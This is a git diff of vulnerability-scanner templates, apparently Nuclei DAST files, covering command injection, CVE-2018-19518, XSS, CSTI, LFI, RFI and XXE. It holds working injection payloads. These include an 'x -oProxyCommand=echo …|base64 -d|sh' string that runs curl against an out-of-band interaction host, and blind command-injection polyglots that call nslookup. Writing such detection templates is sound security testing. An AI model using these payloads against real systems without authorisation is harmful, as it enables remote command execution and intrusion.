diff --git a/dast/cves/2018/CVE-2018-19518.yaml b/dast/cves/2018/CVE-2018-19518.yaml index dcce6456e0..86b34c9f6f 100644 --- a/dast/cves/2018/CVE-2018-19518.yaml +++ b/dast/cves/2018/CVE-2018-19518.yaml @@ -28,15 +28,21 @@ http: payloads: php-imap: - - "x -oProxyCommand=echo {{base64(url_encode('nslookup {{interactsh-url}}'))}}|base64 -d|sh}" + - "x -oProxyCommand=echo {{base64(url_encode('curl {{interactsh-url}}'))}}|base64 -d|sh}" fuzzing: - part: query fuzz: - "{{php-imap}}" + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol words: - - "dns" + - http + + - type: word + part: interactsh_request + words: + - "User-Agent: curl" \ No newline at end of file diff --git a/dast/cves/2022/CVE-2022-42889.yaml b/dast/cves/2022/CVE-2022-42889.yaml index 5b9328d136..db654fe169 100644 --- a/dast/cves/2022/CVE-2022-42889.yaml +++ b/dast/cves/2022/CVE-2022-42889.yaml @@ -64,3 +64,4 @@ http: part: interactsh_request group: 1 regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml index 1a40b9fe6e..1375e5dc86 100644 --- a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml +++ b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml @@ -22,7 +22,7 @@ http: - 'method == "GET"' payloads: - interaction: + payload: - "&nslookup {{marker}}&'\\\"`0&nslookup {{marker}}&`'" - "1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\";nslookup${IFS}{{marker}};#${IFS}" - "/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\"||nslookup({{marker}})||\"/*`*/" @@ -32,7 +32,7 @@ http: - part: query type: postfix fuzz: - - "{{interaction}}" + - "{{payload}}" stop-at-first-match: true matchers: diff --git a/dast/vulnerabilities/crlf/crlf-injection.yaml b/dast/vulnerabilities/crlf/crlf-injection.yaml index 895e06c9d0..3ca54a7502 100644 --- a/dast/vulnerabilities/crlf/crlf-injection.yaml +++ b/dast/vulnerabilities/crlf/crlf-injection.yaml @@ -11,6 +11,7 @@ http: - type: dsl dsl: - 'method == "GET"' + payloads: escape: - "%00" diff --git a/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml b/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml index 6e666f4aa4..adb6d2d1c2 100644 --- a/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml +++ b/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml @@ -4,10 +4,16 @@ info: name: Angular Client-side-template-injection author: theamanrawat severity: high + description: | + Detects Angular client-side template injection vulnerability. + impact: | + May lead to remote code execution or sensitive data exposure. + remediation: | + Sanitize user inputs and avoid using user-controlled data in template rendering. reference: - https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/ - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs - tags: angular,csti,dast + tags: angular,csti,dast,headless,xss variables: first: "{{rand_int(1000, 9999)}}" @@ -19,6 +25,7 @@ headless: - action: navigate args: url: "{{BaseURL}}" + - action: waitload payloads: diff --git a/dast/vulnerabilities/lfi/lfi-keyed.yaml b/dast/vulnerabilities/lfi/lfi-keyed.yaml index 08fbc0f67d..c2d11ba59a 100644 --- a/dast/vulnerabilities/lfi/lfi-keyed.yaml +++ b/dast/vulnerabilities/lfi/lfi-keyed.yaml @@ -1,7 +1,7 @@ id: lfi-keyed info: - name: Key LFI Detection + name: LFI Detection - Keyed author: pwnhxl severity: unknown reference: diff --git a/dast/vulnerabilities/rfi/rfi.yaml b/dast/vulnerabilities/rfi/generic-rfi.yaml similarity index 91% rename from dast/vulnerabilities/rfi/rfi.yaml rename to dast/vulnerabilities/rfi/generic-rfi.yaml index 1758a72019..559895a10b 100644 --- a/dast/vulnerabilities/rfi/rfi.yaml +++ b/dast/vulnerabilities/rfi/generic-rfi.yaml @@ -1,7 +1,7 @@ -id: rfi +id: generic-rfi info: - name: Remote File Inclusion + name: Generic Remote File Inclusion author: m4lwhere severity: high reference: diff --git a/dast/vulnerabilities/xss/dom-xss.yaml b/dast/vulnerabilities/xss/dom-xss.yaml index f01edc6c14..a8e8581203 100644 --- a/dast/vulnerabilities/xss/dom-xss.yaml +++ b/dast/vulnerabilities/xss/dom-xss.yaml @@ -4,18 +4,22 @@ info: name: DOM Cross Site Scripting author: theamanrawat severity: medium - tags: xss,dom,dast - + description: | + Detects DOM-based Cross Site Scripting (XSS) vulnerabilities. + impact: | + Allows attackers to execute malicious scripts in the victim's browser. + remediation: | + Sanitize and validate user input to prevent script injection. + tags: xss,dom,dast,headless variables: num: "{{rand_int(10000, 99999)}}" - headless: - steps: - action: navigate args: url: "{{BaseURL}}" - - action: waitload + - action: waitload payloads: reflection: - "'\">

{{num}}

" @@ -38,8 +42,4 @@ headless: - type: word part: header words: - - "text/html" - - - type: status - status: - - 200 + - "text/html" \ No newline at end of file diff --git a/dast/vulnerabilities/xxe/fuzz-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml similarity index 91% rename from dast/vulnerabilities/xxe/fuzz-xxe.yaml rename to dast/vulnerabilities/xxe/generic-xxe.yaml index 4c36275a40..afe2ae75f2 100644 --- a/dast/vulnerabilities/xxe/fuzz-xxe.yaml +++ b/dast/vulnerabilities/xxe/generic-xxe.yaml @@ -1,7 +1,7 @@ -id: fuzz-xxe +id: generic-xxe info: - name: XXE Fuzzing + name: Generic XML external entity (XXE) author: pwnhxl severity: medium reference: